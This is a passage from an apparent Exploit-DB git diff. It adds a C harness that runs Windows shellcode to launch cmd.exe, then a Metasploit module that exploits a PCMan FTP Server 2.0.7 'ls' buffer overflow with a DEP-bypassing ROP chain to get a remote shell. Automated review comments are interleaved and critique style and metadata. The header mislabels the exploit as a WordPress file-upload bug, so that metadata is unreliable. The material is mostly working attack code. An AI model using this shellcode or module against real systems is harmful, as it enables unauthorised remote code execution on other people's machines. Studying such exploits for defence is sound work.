6c push $0x6c656853 + 4010d2: 54 push %esp + 4010d3: 50 push %eax + 4010d4: ff d6 call *%esi + 4010d6: 83 c4 0d add $0xd,%esp + 4010d9: 31 c9 xor %ecx,%ecx + 4010db: 68 65 78 65 41 push $0x41657865 + 4010e0: 88 4c 24 03 mov %cl,0x3(%esp) + 4010e4: 68 63 6d 64 2e push $0x2e646d63 + 4010e9: 54 push %esp + 4010ea: 59 pop %ecx + 
4010eb: 31 d2 xor %edx,%edx + 4010ed: 42 inc %edx + 4010ee: 52 push %edx + 4010ef: 31 d2 xor %edx,%edx + 4010f1: 52 push %edx + 4010f2: 52 push %edx + 4010f3: 51 push %ecx + 4010f4: 52 push %edx + 4010f5: 52 push %edx + 4010f6: ff d0 call *%eax + 4010f8: ff d7 call *%edi + +*/ + + +#include +#include +char shellcode[]=\ + +"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7"; + +main() +{ +printf("shellcode length %ld\n",(long)strlen(shellcode)); +(* (int(*)()) shellcode) (); +} diff --git a/platforms/win64/remote/39999.rb b/platforms/win64/remote/39999.rb new file mode 100755 index 000000000..a22d3ac16 --- /dev/null +++ b/platforms/win64/remote/39999.rb 
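Review bot: `main()` is declared with no return type and no `return`; implicit `int` was removed in C99 and is a hard error in C23, so the harness should read `int main(void)` and end with `return 0;`. The call `(* (int(*)()) shellcode) ();` converts an object pointer to a function pointer, which the C standard leaves undefined; it is the conventional test-harness idiom but deserves a comment saying it depends on the compiler and platform rather than on the language. The `#include` lines have lost their header names in this listing, so the headers actually used could not be checked.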
@@ -0,0 +1,140 @@ +=begin +# Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload +# Date: 22-06-2016 +# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z +# Exploit Author: quanyechavshuo +# Contact: quanyechavshuo@gmail.com +# Website: http://xinghuacai.github.io +# Category: ftp remote exploit + +1. Description +this is another bug of pcmanftp which can be used to get a remote shell,and fits well with win7x64 with dep open,refer from + https://www.exploit-db.com/exploits/39662/ + +use anonymous and any password to login the ftp remotely,then send a command "ls AAA...A"(9000),the pcmanftp will crashed,later,find the 2009-2012th "A" will replace the pcmanftp's retn address + +=end + +## + # This module requires Metasploit: http://metasploit.com/download + # Current source: https://github.com/rapid7/metasploit-framework + ## + + require 'msf/core' + + class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Ftp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'PCMAN FTP Server Buffer Overflow - ls Command', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability found in the PUT command of the + PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous + credientials are enabled. 
+ }, + 'Author' => + [ + 'quanyechavshuo' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '39662'], + [ 'OSVDB', 'N/A'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process' + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x0A\x0D", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'windows 7 x64 chinese', + { + #'Ret' => 0x77636aeb, #dont need ret here in win7 + 'Offset' => 2008 + } + ], + ], + 'DisclosureDate' => 'Aug 07 2015', + 'DefaultTarget' => 0)) + end + + def check + connect_login + disconnect + + if /220 PCMan's FTP Server 2\.0/ === banner + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def create_rop_chain() + # rop chain generated with mona.py - www.corelan.be + rop_gadgets = + [ + 0x77032c3b, # POP EAX # RETN [kernel32.dll] + 0x41414141, # add a 4 bytes data to fit retn 0x4 from the last function's retn before eip=rop_gadgets + 0x73c112d0, # ptr to &VirtualProtect() [IAT OLEACC.dll] + 0x76bb4412, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSCTF.dll] + 0x76408d2a, # XCHG EAX,ESI # RETN [SHLWAPI.dll] + 0x76b607f0, # POP EBP # RETN [msvcrt.dll] + 0x74916f14, # & push esp # ret [RICHED20.dll] + 0x7368b031, # POP EAX # RETN [COMCTL32.dll] + 0xfffffaff, # Value to negate, will become 0x00000201 + 0x756c9a5c, # NEG EAX # RETN [SHELL32.dll] + 0x767088bd, # XCHG EAX,EBX # RETN [RPCRT4.dll] + 0x77031d7b, # POP EAX # RETN [kernel32.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x76cc4402, # NEG EAX # RETN [SHELL32.dll] + 0x76b4ad98, # XCHG EAX,EDX # RETN [SHELL32.dll] + 0x756b1cc1, # POP ECX # RETN [SHELL32.dll] + 0x7647c663, # &Writable location [USP10.dll] + 0x73756cf3, # POP EDI # RETN [COMCTL32.dll] + 0x76cc4404, # RETN (ROP NOP) [USER32.dll] + 0x76b3f5d4, # POP EAX # RETN [msvcrt.dll] + 0x90909090, # nop + 0x7366e16f, # PUSHAD # RETN [COMCTL32.dll] + + ].flatten.pack("V*") + + return rop_gadgets + + end + + + def exploit + connect_login + + print_status('Generating payload...') 
+ sploit = rand_text_alpha(target['Offset']) + + #tmp = sploit + #print_status(tmp) + sploit << create_rop_chain() + #sploit << make_nops(9) 这句产生的nop并非90 + sploit << "\x90"*30 + #sploit << "\x41"*30 + #sploit << "\xcc" + sploit << payload.encoded + + #tmp=sploit + tmp=make_nops(9) + print_status(tmp) + + send_cmd( ["ls", sploit], false ) + disconnect + end + + end +
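Review bot: The `=begin` header names the wrong exploit — `Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload` — while the module, the `Software Link`, and this commit's CSV entry describe the PCMAN FTP 2.0.7 `ls` command overflow; the `Description` likewise says `PUT command` where the code sends `ls`. Both should be corrected to match `send_cmd( ["ls", sploit], false )`. In `exploit`, `tmp=make_nops(9)` / `print_status(tmp)` is leftover debugging that prints raw NOP bytes to the console; drop it together with the commented-out `sploit` variants. The comment `这句产生的nop并非90` should be in English (it says the NOPs this call produces are not `0x90`), and `['OSVDB', 'N/A']` is not a usable reference and should be removed.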